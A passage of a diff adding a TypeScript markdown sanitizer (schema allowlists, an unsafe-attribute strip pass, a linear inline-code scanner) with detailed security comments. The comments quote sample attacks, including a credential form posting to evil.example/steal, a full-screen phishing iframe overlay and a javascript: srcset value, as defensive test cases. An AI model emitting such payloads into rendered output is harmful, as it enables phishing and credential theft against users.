+ // the URL-scheme guards in rehypeStripUnsafe still apply to attributes.
176
+ '*': ['className', 'id', 'data*', 'dir', 'title', 'lang'],
177
+ a: ['target', 'rel', 'href'],
178
+ div: ['style'],
179
+ span: ['style'],
180
+ p: ['style'],
181
+ blockquote: ['style', 'cite'],
182
+ td: ['colSpan', 'rowSpan', 'align', 'style'],
183
+ th: ['colSpan', 'rowSpan', 'align', 'scope', 'style'],
184
+ img: ['src', 'srcSet', 'sizes', 'alt', 'width', 'height', 'loading', 'decoding'],
185
+ iframe: ['src', 'width', 'height', 'allow', 'allowFullScreen', 'frameBorder', 'loading', 'referrerPolicy', 'style'],
186
+ video: ['src', 'poster', 'controls', 'width', 'height', 'loop', 'muted', 'autoPlay', 'playsInline', 'preload'],
187
+ source: ['src', 'type', 'media', 'srcSet', 'sizes'],
188
+ audio: ['src', 'controls', 'loop', 'muted', 'preload'],
189
+ track: ['src', 'kind', 'srcLang', 'label', 'default'],
190
+ time: ['dateTime'],
191
+ details: ['open'],
192
+ // Form elements (allow the benign presentational subset).
193
+ //
194
+ // `input` carries EXACTLY the GFM task-list contract and nothing else.
195
+ // Dropping the attribute widening alone was not enough: defaultSchema
196
+ // pins `required.input = { type:'checkbox', disabled:true }`, and
197
+ // `required` force-ADDS those properties regardless of what the author
198
+ // wrote — so `<input type="text" placeholder="email">` still came out as
199
+ // a disabled checkbox. `buildSanitizeSchema` therefore clears
200
+ // `required.input` (remark-gfm emits `type="checkbox" disabled` on task
201
+ // items itself, so the coercion was redundant) and the contract is
202
+ // expressed here instead: type is pinned to the literal `checkbox`, so a
203
+ // text input degrades to a bare `<input>` rather than a fake checkbox.
204
+ input: [['type', 'checkbox'], 'checked', 'disabled'],
205
+ button: ['type', 'disabled', 'name', 'value'],
206
+ // Legacy presentational tag — without its own attributes the sanitizer
207
+ // would keep `<font>` but strip everything that makes it do anything.
208
+ font: ['color', 'size', 'face'],
209
+ select: ['disabled', 'multiple', 'name'],
210
+ option: ['value', 'selected', 'disabled'],
211
+ optgroup: ['label', 'disabled'],
212
+ textarea: ['rows', 'cols', 'placeholder', 'disabled', 'readOnly', 'name'],
213
+ label: ['htmlFor'],
214
+ col: ['span'],
215
+ colgroup: ['span'],
216
+ }
217
+
218
+ /**
219
+ * SVG presentation/geometry attributes, keyed the way hast keys them:
220
+ * property-information normalizes `font-size` → `fontSize`,
221
+ * `stroke-dasharray` → `strokeDasharray`, … BEFORE the sanitizer sees the
222
+ * tree, so ONLY the camelCase spellings are load-bearing. The dashed
223
+ * spellings previously listed alongside them were dead weight (they never
224
+ * matched anything) and are gone; do not re-add them.
225
+ *
226
+ * `style` is allowed here for parity with div/span/p (same 2026-07 audit
227
+ * rationale — authored SVG carries inline `style` and both pre-unification
228
+ * renderers kept it; the URL guards in rehypeStripUnsafe still apply).
229
+ */
230
+ const SVG_ATTRIBUTES = [
231
+ 'viewBox', 'xmlns', 'd', 'fill', 'stroke', 'cx', 'cy', 'r', 'rx', 'ry',
232
+ 'x', 'y', 'x1', 'y1', 'x2', 'y2', 'points', 'transform', 'opacity',
233
+ 'offset', 'width', 'height', 'style',
234
+ // NOTE the exact casing: property-information's SVG map uses
235
+ // `strokeDashArray` / `strokeDashOffset` / `strokeMiterLimit` (capital
236
+ // A/O/L), NOT the react-DOM spellings. A near-miss here fails SILENTLY —
237
+ // the attribute is simply stripped. Verify against
238
+ // node_modules/property-information/lib/svg.js before adding one.
239
+ 'strokeWidth', 'strokeDashArray', 'strokeDashOffset', 'strokeMiterLimit',
240
+ 'strokeOpacity', 'strokeLinecap', 'strokeLinejoin',
241
+ 'fillRule', 'fillOpacity',
242
+ 'stopColor', 'stopOpacity',
243
+ 'fontSize', 'fontFamily', 'fontWeight', 'fontStyle', 'fontStretch',
244
+ 'textAnchor', 'dominantBaseline', 'alignmentBaseline', 'letterSpacing',
245
+ 'dx', 'dy', 'markerEnd', 'markerMid', 'markerStart',
246
+ 'gradientUnits', 'gradientTransform', 'patternUnits', 'maskUnits',
247
+ 'preserveAspectRatio',
248
+ 'clipPath', 'clipRule',
249
+ // `href` / `xlink:href` stay DELIBERATELY DISALLOWED on SVG elements:
250
+ // `<use href>` pulls in an external document fragment and the hast key
251
+ // (`xlinkHref`) is outside rehypeStripUnsafe's URL_ATTRS check, so it
252
+ // would be an unguarded URL sink. Consequence, stated plainly: PASTED
253
+ // ICON SPRITES THAT RELY ON `<use href="#id">` RENDER EMPTY. Hand-drawn
254
+ // inline SVG (the audited real-content case) is unaffected.
255
+ ]
256
+
257
+ export interface BuildSanitizeSchemaOptions {
258
+ extraAllowedHtmlTags?: string[]
259
+ }
260
+
261
+ /**
262
+ * The engine's sanitize schema: defaultSchema ∪ SAFE_HTML_TAGS ∪ extras.
263
+ * - `extraAllowedHtmlTags` is unioned into tagNames here AND into the
264
+ * pre-pass set (buildEffectiveTagSet) — the coupled-allowlist invariant.
265
+ * - `clobberPrefix: ''` + empty `clobber`: authored raw-HTML anchors
266
+ * (`<h2 id="…">`) keep their ids so `[jump](#anchor)` deep-links work.
267
+ * (The renderer's own heading ids are injected at the React layer,
268
+ * post-rehype, and were never affected.)
269
+ * - `card`/`mention` protocols registered for href so chat markers survive
270
+ * (the urlTransform below is the second gate).
271
+ */
272
+ export function buildSanitizeSchema(options: BuildSanitizeSchemaOptions = {}) {
273
+ // Canonical spelling AND lowercase for every tag: parse5 emits SVG
274
+ // foreign-content tags camelCased (`linearGradient`), HTML tags
275
+ // lowercased — admitting both keeps the schema list a superset of the
276
+ // (lowercased) pre-pass set, so the two are equal case-insensitively.
277
+ const tagNames = new Set<string>()
278
+ for (const tag of effectiveTagList(options.extraAllowedHtmlTags)) {
279
+ tagNames.add(tag)
280
+ tagNames.add(tag.toLowerCase())
281
+ }
282
+
283
+ const attributes: Record<string, Array<string | [string, ...unknown[]]>> = {
284
+ ...(defaultSchema.attributes as Record<string, Array<string | [string, ...unknown[]]>>),
285
+ }
286
+ for (const [tag, attrs] of Object.entries(EXTRA_ATTRIBUTES)) {
287
+ attributes[tag] = [...(attributes[tag] ?? []), ...attrs]
288
+ }
289
+ for (const tag of SVG_TAGS) {
290
+ attributes[tag] = [...(attributes[tag] ?? []), ...SVG_ATTRIBUTES]
291
+ const lower = tag.toLowerCase()
292
+ if (lower !== tag) attributes[lower] = [...(attributes[lower] ?? []), ...SVG_ATTRIBUTES]
293
+ }
294
+
295
+ // MAKE THE PER-TAG LISTS ACTUALLY AUTHORITATIVE.
296
+ //
297
+ // `hast-util-sanitize` looks a property up in `attributes[tagName]` and, when
298
+ // it is ABSENT there, RETRIES against `attributes['*']` (see its
299
+ // `properties()`). A per-tag list therefore narrows nothing on its own — it
300
+ // only ADDS. defaultSchema (GitHub's schema) puts the whole form vocabulary
301
+ // on `*` — `action`, `method`, `encType`, `name`, `value`, `size`,
302
+ // `maxLength`, `readOnly`, `accept`, `multiple` — so the `input` entry above,
303
+ // documented as "EXACTLY the GFM task-list contract and nothing else", was
304
+ // inert: `<input name="password" size="40">` kept both attributes.
305
+ //
306
+ // Verified consequence before this filter: the markdown
307
+ // <form action="https://evil.example/steal" method="post">
308
+ // <input name="email"><input name="password">
309
+ // <button type="submit">Sign in</button></form>
310
+ // rendered VERBATIM on the CHAT surface — a working cross-origin credential
311
+ // form inside trusted app chrome, from untrusted model output, one click from
312
+ // submitting. `form` has no per-tag entry at all, so it took `action`/`method`
313
+ // straight from `*`.
314
+ //
315
+ // Stripping these from `*` leaves every legitimate use intact, because the
316
+ // tags that genuinely need them declare them per-tag (`button`, `select`,
317
+ // `option`, `textarea` for `name`/`value`, `input` for `checked`).
318
+ //
319
+ // The two non-form uses that in principle relied on `*` — `<a name="anchor">`
320
+ // and `<li value="3">` — were checked and need NO re-declaration: the base
321
+ // `a` / `li` renderers build their own elements and never forwarded either
322
+ // attribute, so neither reached the DOM before this filter (verified by
323
+ // reverting it). Pinned by ./__tests__/sanitize-render.test.tsx so the fact
324
+ // stays recorded rather than re-derived.
325
+ const STAR_FORM_ATTRIBUTES = new Set([
326
+ 'action', 'method', 'encType', 'name', 'value',
327
+ 'size', 'maxLength', 'readOnly', 'accept', 'acceptCharset', 'multiple', 'prompt',
328
+ ])
329
+ attributes['*'] = (attributes['*'] ?? []).filter((attr) => {
330
+ const key = Array.isArray(attr) ? attr[0] : attr
331
+ return !STAR_FORM_ATTRIBUTES.has(key as string)
332
+ })
333
+
334
+ // SVG-only tags are pinned to an `svg` ancestor (canonical AND lowercase
335
+ // spelling, matching the tagNames treatment above) so a bare `<title>` /
336
+ // `<text>` / `<g>` in prose is DROPPED instead of hijacking the page.
337
+ const ancestors: Record<string, string[]> = {
338
+ ...(defaultSchema.ancestors as Record<string, string[]> | undefined),
339
+ }
340
+ for (const [tag, required] of Object.entries(SVG_ONLY_ANCESTORS)) {
341
+ ancestors[tag] = required
342
+ ancestors[tag.toLowerCase()] = required
343
+ }
344
+
345
+ // `required.input` is CLEARED — see the `input` note in EXTRA_ATTRIBUTES.
346
+ // defaultSchema force-adds `type="checkbox" disabled` to every `<input>`,
347
+ // rewriting authored text inputs into fake disabled checkboxes; remark-gfm
348
+ // already emits both properties on real task-list items, so nothing is
349
+ // lost. The attribute allowlist pins `type` to the literal `checkbox`.
350
+ const required: Record<string, Record<string, unknown>> = {
351
+ ...(defaultSchema.required as Record<string, Record<string, unknown>> | undefined),
352
+ }
353
+ delete required.input
354
+
355
+ return {
356
+ ...defaultSchema,
357
+ tagNames: [...tagNames],
358
+ attributes,
359
+ ancestors,
360
+ required,
361
+ clobberPrefix: '',
362
+ clobber: [],
363
+ protocols: {
364
+ ...defaultSchema.protocols,
365
+ href: [...(defaultSchema.protocols?.href ?? []), 'card', 'mention'],
366
+ },
367
+ }
368
+ }
369
+
370
+ // ---------------------------------------------------------------------------
371
+ // rehypeStripUnsafe — defense-in-depth strip pass (kept verbatim from the
372
+ // pre-unification SimpleMarkdownRenderer)
373
+ // ---------------------------------------------------------------------------
374
+ const EVENT_HANDLER_ATTR_RE = /^on[a-z]+$/i
375
+
376
+ /**
377
+ * CSS declarations that take an element OUT of the document flow, i.e. the
378
+ * primitive every UI-redress payload needs. Matched per declaration (the
379
+ * `style` attribute is split on `;` first), so decorative styling on the same
380
+ * element is preserved. `inset` and the individual offsets are included because
381
+ * `position` alone is not the only lever — a `position:sticky` left behind with
382
+ * `top:0;z-index:…` still floats content over the page.
383
+ */
384
+ const POSITIONING_DECL_RE =
385
+ /(?:^|[\s;])(?:position|z-index|inset(?:-block|-inline)?(?:-start|-end)?|top|right|bottom|left)\s*:/i
386
+ const JAVASCRIPT_URL_RE = /^[\s\x00-\x1f]*javascript:/i
387
+ const DATA_URL_RE = /^[\s\x00-\x1f]*data:/i
388
+ const URL_ATTRS = new Set([
389
+ 'href',
390
+ 'src',
391
+ 'srcset',
392
+ 'formaction',
393
+ 'xlink:href',
394
+ 'poster',
395
+ 'data',
396
+ 'action',
397
+ 'background',
398
+ ])
399
+
400
+ /**
401
+ * Returns true if any candidate in an `srcset` attribute has a dangerous
402
+ * URL scheme. srcset is a comma-separated candidate list — a single-URL
403
+ * check would miss a malicious second candidate
404
+ * (`"https://safe.png 1x, javascript:alert(1) 2x"`). Over-splitting on
405
+ * commas inside URL paths over-strips, which is the correct error bias.
406
+ */
407
+ function srcsetHasUnsafeCandidate(srcset: string): boolean {
408
+ for (const candidate of srcset.split(',')) {
409
+ const url = candidate.trim().split(/\s+/)[0] ?? ''
410
+ if (JAVASCRIPT_URL_RE.test(url) || DATA_URL_RE.test(url)) return true
411
+ }
412
+ return false
413
+ }
414
+
415
+ const STRIP_ELEMENTS = new Set([
416
+ 'script',
417
+ 'style',
418
+ 'noscript',
419
+ 'noembed',
420
+ 'object',
421
+ 'embed',
422
+ 'applet',
423
+ 'base',
424
+ 'meta',
425
+ ])
426
+
427
+ export function rehypeStripUnsafe() {
428
+ // eslint-disable-next-line @typescript-eslint/no-explicit-any
429
+ return (tree: any) => {
430
+ visit(tree, 'element', (node: any, index: number | undefined, parent: any) => {
431
+ const tag = String(node.tagName ?? '').toLowerCase()
432
+ if (STRIP_ELEMENTS.has(tag)) {
433
+ if (parent && typeof index === 'number') {
434
+ parent.children.splice(index, 1)
435
+ // Return the numeric index so the walker resumes at the slot the
436
+ // removed node vacated.
437
+ return index
438
+ }
439
+ // Root-level strip element — neutralize in place.
440
+ node.children = []
441
+ node.tagName = 'span'
442
+ node.properties = {}
443
+ return
444
+ }
445
+ if (!node.properties || typeof node.properties !== 'object') return
446
+ for (const key of Object.keys(node.properties)) {
447
+ if (EVENT_HANDLER_ATTR_RE.test(key)) {
448
+ delete node.properties[key]
449
+ continue
450
+ }
451
+ if (URL_ATTRS.has(key.toLowerCase())) {
452
+ const raw = node.properties[key]
453
+ const v = Array.isArray(raw) ? raw[0] : raw
454
+ if (typeof v === 'string') {
455
+ const unsafe =
456
+ key.toLowerCase() === 'srcset'
457
+ ? srcsetHasUnsafeCandidate(v)
458
+ : JAVASCRIPT_URL_RE.test(v) || DATA_URL_RE.test(v)
459
+ if (unsafe) {
460
+ delete node.properties[key]
461
+ continue
462
+ }
463
+ }
464
+ }
465
+ if (tag === 'iframe' && key.toLowerCase() === 'srcdoc') {
466
+ delete node.properties[key]
467
+ continue
468
+ }
469
+ // OVERLAY / UI-REDRESS GUARD. `style` is allowed (a content audit found
470
+ // real published posts relying on it for `div.takeaway`, table styling
471
+ // and reddit blockquotes), but the positioning subset of CSS is not a
472
+ // decoration — it is a way to lift untrusted markup out of the message
473
+ // body and put it over the whole application. Verified before this
474
+ // guard: a single chat message containing
475
+ // <iframe src="https://evil.example/phish"
476
+ // style="position:fixed;top:0;left:0;width:100vw;height:100vh;
477
+ // z-index:2147483647">
478
+ // rendered an attacker-controlled cross-origin document covering the
479
+ // entire viewport above every piece of app chrome (toasts at z-9999
480
+ // included); the `<span style="position:fixed;inset:0">` variant does the
481
+ // same with no frame at all. Chat content is model output, so this is
482
+ // reachable from untrusted input.
483
+ //
484
+ // Only the escape-the-flow declarations are dropped, and per-declaration
485
+ // rather than by discarding the whole attribute, so ordinary decorative
486
+ // styling on the same element survives. THE TRADE-OFF, STATED: authored
487
+ // content that legitimately wanted `position:sticky` (a pinned table
488
+ // header, say) loses it — deliberately, because there is no way to tell
489
+ // it apart from the redress payload at this layer, and a sticky header is
490
+ // a smaller loss than a full-page phishing surface.
491
+ if (key.toLowerCase() === 'style') {
492
+ const raw = node.properties[key]
493
+ if (typeof raw === 'string' && POSITIONING_DECL_RE.test(raw)) {
494
+ const cleaned = raw
495
+ .split(';')
496
+ .filter((decl) => !POSITIONING_DECL_RE.test(decl))
497
+ .join(';')
498
+ .trim()
499
+ if (cleaned === '' || cleaned === ';') delete node.properties[key]
500
+ else node.properties[key] = cleaned
501
+ }
502
+ }
503
+ }
504
+ })
505
+ }
506
+ }
507
+
508
+ // ---------------------------------------------------------------------------
509
+ // escapeUnknownHtmlTags — TEXT pre-pass (React 19 crash guard)
510
+ // ---------------------------------------------------------------------------
511
+ // ReDoS-safe shape (CodeQL polynomial-regex hardening): every quantifier is
512
+ // hard-bounded (tag name ≤63 chars, attrs ≤4096) so matching is
513
+ // constant-time per tag. Anything longer falls through as plain text —
514
+ // the safe-degrade behavior for HTML-in-markdown.
515
+ const TAG_LIKE_REGEX = /<(\/?)([a-zA-Z][a-zA-Z0-9-]{0,63})((?:\s[^>]{0,4096}?)?)(\/?)>/g
516
+
517
+ /**
518
+ * Tags whose HTML content model is RAWTEXT / RCDATA / PLAINTEXT: once parse5
519
+ * sees the start tag, EVERYTHING up to the matching end tag (or, if there is
520
+ * none, to end of input) is consumed as that element's text — headings,
521
+ * paragraphs, list items and all.
522
+ *
523
+ * The tokenizer runs BEFORE the sanitizer, so an allowlist entry (or an
524
+ * `ancestors` pin, as `title` got in round 2) cannot undo the damage: by the
525
+ * time the schema is consulted, the rest of the message is already a single
526
+ * text node hanging off the wrong element. Observed with the unclosed forms:
527
+ * `<textarea>` → the remainder of the message becomes the editable value
528
+ * of a live textarea
529
+ * `<iframe>` → the remainder is swallowed into an `about:blank` frame
530
+ * `<title>` → the remainder de-structures (headings stop being headings)
531
+ * Any chat message or post that merely MENTIONS one of these in prose — an
532
+ * LLM explaining HTML forms will — mangles everything after it.
533
+ *
534
+ * The TEXT pre-pass is the layer built for exactly this: it runs before
535
+ * parse5 and is purely textual. An opening tag from this set is escaped
536
+ * unless its matching `</tag>` appears LATER in the source, in which case the
537
+ * RAWTEXT span is bounded and the element renders normally (see the
538
+ * `closed-*` fixtures). This check is deliberately independent of the
539
+ * allowlist — it constrains tags the sanitizer WOULD keep.
540
+ */
541
+ const RAWTEXT_TAGS = new Set([
542
+ 'title', 'textarea', 'iframe', 'xmp', 'noembed', 'noframes', 'plaintext',
543
+ ])
544
+
545
+ /**
546
+ * Fenced code blocks and inline code spans — the regions whose `<tags>` are
547
+ * literal content and must survive the escaping pass verbatim.
548
+ *
549
+ * Drives the escaping CARVE in `escapeUnknownHtmlTags`. It is deliberately
550
+ * NARROWER than what the MASK now understands: the mask is the security
551
+ * boundary (too-narrow ⇒ a live `<textarea>` swallows the document) while the
552
+ * carve is cosmetic (too-narrow ⇒ a code sample renders as escaped text), so
553
+ * they are allowed to differ — but only in that direction, and that is now
554
+ * ENFORCED rather than assumed: `escapeUnknownHtmlTags` protects only the
555
+ * INTERSECTION of carve and mask, so a span this regex over-detects is escaped
556
+ * instead of sheltered. See the CARVE DECISION note on `buildCloserHaystack`.
557
+ *
558
+ * Deliberately NARROWER than `createFenceTracker`'s CommonMark notion: this is
559
+ * a flat regex over source TEXT with no line-state, so it only recognizes a
560
+ * fence that is CLOSED by a same-marker run. That is the correct bias here —
561
+ * an unclosed fence leaves its body UNPROTECTED, so a `<textarea>` inside it
562
+ * gets escaped (visible as escaped text) rather than left live. Using the real
563
+ * tracker would mean re-deriving character offsets from line state for a pass
564
+ * that is explicitly not a security boundary; the narrow form fails safe.
565
+ * `~{3,}` and the CommonMark 0..3-space indent ARE handled (they were not
566
+ * before: a `~~~` block containing `<textarea>` rendered as escaped text).
567
+ *
568
+ * The MASK does NOT use this regex's fence alternative at all any more — see
569
+ * `buildCloserHaystack`, which derives its code regions from the real
570
+ * `createFenceTracker` (plus indented / blockquoted / commented code). Only the
571
+ * INLINE-CODE region is derived separately, by `findInlineCodeRanges` below —
572
+ * which is no longer a regex and no longer shares this one's length cap.
573
+ */
574
+ const PROTECTED_SPAN_RE =
575
+ /^ {0,3}(`{3,}|~{3,})[\s\S]*?^ {0,3}\1[^\n]*$|(`+)[^\n]{0,4096}?\2/gm
576
+
577
+ /**
578
+ * The INLINE-CODE half of `PROTECTED_SPAN_RE`, on its own — the mask's only
579
+ * non-line-state code region. Everything block-level (fences, indented code,
580
+ * blockquoted code, HTML comments) is derived from line state instead, because
581
+ * a flat regex cannot express CommonMark's closer rules: `PROTECTED_SPAN_RE`
582
+ * ends a fenced span at the FIRST same-marker run even when that run carries an
583
+ * info string (```` ```html ````), which CommonMark forbids on a closer — so the
584
+ * span ended early and the real code content was left unmasked.
585
+ *
586
+ * NO LENGTH CAP, AND NO REGEX (round 16 — SECURITY). This used to be
587
+ * `` /(`+)[^\n]{0,4096}?\1/g ``, sharing `PROTECTED_SPAN_RE`'s 4096-char
588
+ * ReDoS bound. An inline span LONGER than the cap matched NEITHER regex, so the
589
+ * mask simply skipped it — leaving a `</textarea>` written inside that span
590
+ * VISIBLE in the closer haystack, `hasLaterCloser` true, the prose opener LIVE,
591
+ * and parse5 swallowing the rest of the message as the textarea's value.
592
+ * A clean cliff, padding length the only variable: span content ≤4094 chars ⇒
593
+ * blanked, opener escaped, 0 live textareas; ≥4099 ⇒ closer visible, 1 live
594
+ * textarea. That is a fail-OPEN in the security boundary, and it contradicts
595
+ * this module's own contract that every mask approximation "rounds towards
596
+ * blanking".
597
+ *
598
+ * THE BOUND COULD NOT SIMPLY BE DROPPED. `[^\n]` confines backtracking to one
599
+ * LINE, but a single line is not a small input — a chat message can be one.
600
+ * MEASURED (round 16, this repo's vitest env, one line of nothing but
601
+ * backticks — the pathological shape; figures from plain node are within 3%):
602
+ *
603
+ * input capped regex uncapped regex this linear scan
604
+ * 50K chars 295 ms (5.9 µs/c) 615 ms (12.3 µs/c) 0.69 ms (14 ns/c)
605
+ * 200K chars 1220 ms (6.1 µs/c) 9772 ms (48.9 µs/c) 0.42 ms (2 ns/c)
606
+ * 800K chars 5072 ms (6.3 µs/c) 158263 ms (198 µs/c) — (node)
607
+ *
608
+ * The capped regex is flat per char (linear, huge constant); the UNCAPPED one
609
+ * is plainly QUADRATIC — 31x the capped cost at 800KB and still climbing. Every
610
+ * other shape probed (lone tick + text, `` `` `` + text, one tick per 32 chars,
611
+ * one tick per line) is ≈2-4 ns/char in BOTH regex spellings, so the blowup is
612
+ * specific to long backtick runs — which an attacker controls. The cap was load
613
+ * bearing; the REGEX is what had to go. A realistic 260KB backtick-dense
614
+ * message (`Use `foo` and `bar` here.` × 10000) scans in 4.2 ms.
615
+ *
616
+ * `findInlineCodeRanges` is a LINEAR index scan that reproduces the old
617
+ * regex's match semantics exactly (verified by differential fuzz against the
618
+ * uncapped regex) with no backtracking and no cap: per line it collects the
619
+ * backtick RUNS, then for each opener run of length `n` picks the largest
620
+ * closer length `k ≤ n` that occurs later on the line — either inside the same
621
+ * run (needs `n ≥ 2k`, mirroring the regex giving back backticks from a greedy
622
+ * `` (`+) ``) or at the earliest following run of length ≥ k — and takes the
623
+ * EARLIEST such position (the lazy quantifier). The forward walk is amortized
624
+ * O(1) per run because the scan cursor jumps past every run it skipped.
625
+ *
626
+ * `PROTECTED_SPAN_RE` (the CARVE) KEEPS its cap, deliberately: the two
627
+ * consumers round in OPPOSITE directions, see the note on
628
+ * `escapeLeftoverTagStarts`. In the carve, "not known to be code" means ESCAPE,
629
+ * so an over-cap span there costs a code sample rendered as escaped text.
630
+ */
631
+ const BACKTICK_CODE = 0x60
632
+
633
+ /**
634
+ * PARAGRAPH SEGMENTS, NOT LINES (round 18 — SECURITY). A CommonMark code span
635
+ * CROSSES LINE BREAKS: `` `foo\n</textarea>` `` is one `inlineCode` node, so
636
+ * that `</textarea>` is a code sample and not a closer — yet this scan (and
637
+ * `PROTECTED_SPAN_RE`, whose body class is `[^\n]`) was strictly PER LINE, so
638
+ * the mask never saw the span, the closer stayed visible in the haystack,
639
+ * `hasLaterCloser` returned true, and a prose `<textarea>` above it stayed LIVE
640
+ * (`escapeUnknownHtmlTags` returned the input BYTE-IDENTICAL; the renderer
641
+ * emitted `<code>foo </textarea></code>` — proving the closer is a code sample
642
+ * — beside a live textarea swallowing the prose). This is the shape that is not
643
+ * a CONTAINER at all, so no container sweep could ever have reached it.
644
+ *
645
+ * A code span CANNOT cross a paragraph break, so the scan unit is a maximal run
646
+ * of non-blank lines. Blank lines still terminate a segment, which keeps the
647
+ * fail-CLOSED direction (an unterminated opener consumes at most its own
648
+ * paragraph, never the rest of the document) and keeps the bound linear — the
649
+ * `suffMax` / cursor structure is unchanged, `\n` is simply an ordinary
650
+ * character inside a segment.
651
+ *
652
+ * `PROTECTED_SPAN_RE` (the CARVE) is deliberately left per-line: it rounds the
653
+ * other way, so at worst a multi-line code sample renders as escaped text.
654
+ */
655
+ function findInlineCodeRanges(source: string): Array<[number, number]> {
656
+ const ranges: Array<[number, number]> = []
657
+ const len = source.length
658
+ let pos = 0
659
+ while (pos <= len) {
660
+ // Grow one PARAGRAPH SEGMENT: the maximal run of non-blank lines starting
661
+ // at or after `pos`. `segStart`/`segEnd` bound it; blank lines never enter.
662
+ let segStart = -1
663
+ let segEnd = -1
664
+ while (pos <= len) {
665
+ let end = source.indexOf('\n', pos)
666
+ if (end === -1) end = len
667
+ const blank = isBlankLine(source.slice(pos, end))
668
+ if (blank && segStart !== -1) break
669
+ if (!blank) {
670
+ if (segStart === -1) segStart = pos
671
+ segEnd = end
672
+ }
673
+ pos = end === len ? len + 1 : end + 1
674
+ }
675
+ if (segStart === -1) break
676
+ const lineStart = segStart
677
+ const lineEnd = segEnd
678
+ const runStart: number[] = []
679
+ const runLen: number[] = []
680
+ for (let i = lineStart; i < lineEnd; i++) {
681
+ if (source.charCodeAt(i) !== BACKTICK_CODE) continue
682
+ let j = i + 1
683
+ while (j < lineEnd && source.charCodeAt(j) === BACKTICK_CODE) j++
684
+ runStart.push(i)
685
+ runLen.push(j - i)
686
+ i = j - 1
687
+ }
688
+ const n = runStart.length
689
+ if (n > 0) {
690
+ // suffMax[t] = longest run at or after t; 0 past the end.
691
+ const suffMax = new Array<number>(n + 1).fill(0)
692
+ for (let t = n - 1; t >= 0; t--) suffMax[t] = Math.max(runLen[t], suffMax[t + 1])
693
+ let cursor = lineStart
694
+ let idx = 0
695
+ while (idx < n) {
696
+ const runEnd = runStart[idx] + runLen[idx]
697
+ // The scan resumes at the END of the previous match, which can land
698
+ // MID-RUN — exactly as the global regex's `lastIndex` did. The
699
+ // REMAINDER of the run is then an opener in its own right (`` `a`` ``
700
+ // matches twice), so clamp rather than skip.
701
+ if (runEnd <= cursor) {
702
+ idx++
703
+ continue
704
+ }
705
+ const p = Math.max(runStart[idx], cursor)
706
+ const openLen = runEnd - p
707
+ // Largest closer length reachable via a LATER run, and via THIS one.
708
+ const kLater = Math.min(openLen, suffMax[idx + 1])
709
+ const kSame = openLen >> 1
710
+ const k = Math.max(kLater, kSame)
711
+ // No match is possible only when this is the last run and it is a
712
+ // single backtick — every longer run closes on itself, so advancing by
713
+ // one character (what the regex does) cannot find one either.
714
+ if (k < 1) {
715
+ cursor = runEnd
716
+ idx++
717
+ continue
718
+ }
719
+ let q = kSame >= k ? p + k : -1
720
+ if (q === -1)
721
+ for (let t = idx + 1; t < n; t++)
722
+ if (runLen[t] >= k) {
723
+ q = runStart[t]
724
+ break
725
+ }
726
+ ranges.push([p, q + k])
727
+ cursor = q + k
728
+ }
729
+ }
730
+ }
731
+ return ranges
732
+ }
733
+
734
+ /** Exported for the differential fuzz against the retired regex. */
735
+ export const __findInlineCodeRangesForTest = findInlineCodeRanges
736
+
737
+ /**
738
+ * ASCII-ONLY case fold. `String.prototype.toLowerCase()` is NOT
739
+ * length-preserving: U+0130 (Turkish dotted capital `İ`) expands to `i` +
740
+ * U+0307 (1 code unit → 2). It is the only BMP character that does so, and it
741
+ * is ordinary Turkish prose (`İstanbul`, `İzmir`) — so a message with enough
742
+ * of them ahead of a `<textarea>` shifted the whole haystack later than the
743
+ * `segmentOffset + index + match.length` the caller computes from the ORIGINAL
744
+ * text, `hasLaterCloser` began scanning in a window strictly BEFORE the
745
+ * opener, matched an already-consumed `</textarea>`, and left the opener LIVE
746
+ * — reopening the RAWTEXT swallow the mask exists to close.
747
+ *
748
+ * Tag names are ASCII by definition (`TAG_LIKE_REGEX` only matches
749
+ * `[a-zA-Z][a-zA-Z0-9-]*`), so folding ASCII alone loses nothing.
750
+ * `buildCloserHaystack(src).length === src.length` is asserted over the whole
751
+ * fixture corpus in the parity test — that invariant is the actual guard.
752
+ */
753
+ function foldAsciiCase(text: string): string {
754
+ return text.replace(/[A-Z]/g, (c) => String.fromCharCode(c.charCodeAt(0) + 32))
755
+ }
756
+
757
+ /**
758
+ * ---------------------------------------------------------------------------
759
+ * MASK-ONLY code-region blanking (never the carve)
760
+ * ---------------------------------------------------------------------------
761
+ * All of the blanking passes below share one contract:
762
+ *
763
+ * - they SCAN `source` (the folded but otherwise unmasked copy) and APPLY the
764
+ * resulting ranges to `masked`. That split is LOAD-BEARING: the inline-code
765
+ * pass chews a pair of backticks off an unclosed ```` ``` ```` opener (the
766
+ * opener run gives back backticks until a single one matches the next one as
767
+ * its closer), so a fence scan over the masked copy sees no fence at all. Both
768
+ * strings have identical indices, so offsets transfer verbatim.
769
+ * `blankComments` is the ONE deliberate exception (it is fed the masked
770
+ * copy, and runs last) — see its docblock for why the reasoning inverts.
771
+ * - they are LENGTH-PRESERVING (every non-newline char in a range becomes a
772
+ * space), because `escapeOutsideFences` indexes the mask with offsets it
773
+ * computed from the ORIGINAL text.
774
+ * - they fail CLOSED. Blanking too much can only make `hasLaterCloser` return
775
+ * false, i.e. ESCAPE a RAWTEXT opener that could have stayed live; blanking
776
+ * too little leaves a prose `<textarea>` live and lets parse5 swallow the
777
+ * rest of the message. Every approximation here therefore rounds towards
778
+ * blanking.
779
+ *
780
+ * ---------------------------------------------------------------------------
781
+ * THE SAFETY CLAIM IS LINE COVERAGE, NOT PASS COMPOSITION (round 18)
782
+ * ---------------------------------------------------------------------------
783
+ * Round 17 claimed this class was "closed by proof" and offered a PASS CALL
784
+ * MATRIX — which pass invokes which — as the proof. That was the wrong
785
+ * property, and round 18 found the eighth instance anyway. The matrix shows the
786
+ * passes COMPOSE SYMMETRICALLY; it says nothing about whether every line of the
787
+ * document is actually EXAMINED. Round 18's defect lived inside a pass that the
788
+ * matrix lists as present and symmetric (`blankListItemCode` calls and is called
789
+ * by `blankQuotedCode`): the pass simply never put the LIST-MARKER LINE into any
790
+ * run, so that one line was examined by nobody. A symmetric call graph over an
791
+ * incomplete line set is still incomplete. Do not restate the matrix as the
792
+ * safety argument.
793
+ *
794
+ * ---------------------------------------------------------------------------
795
+ * THE TABLE IS THE AUDITABLE ARTIFACT — AND TWO OF ITS ENTRIES WERE FALSE
796
+ * ---------------------------------------------------------------------------
797
+ * Round 19 audited the table below rather than the code, and found two entries
798
+ * literally untrue. Both were LOAD-BEARING: the `blankListItemCode` entry
799
+ * justified a `top >= 4` gate that hid three live instances (narrow `- ` / `1. `
800
+ * marker lines), and the `blankLinkDefinitions` entry's "absorbs … ONE list
801
+ * marker" justified never re-cutting nested markers. A table entry that is not
802
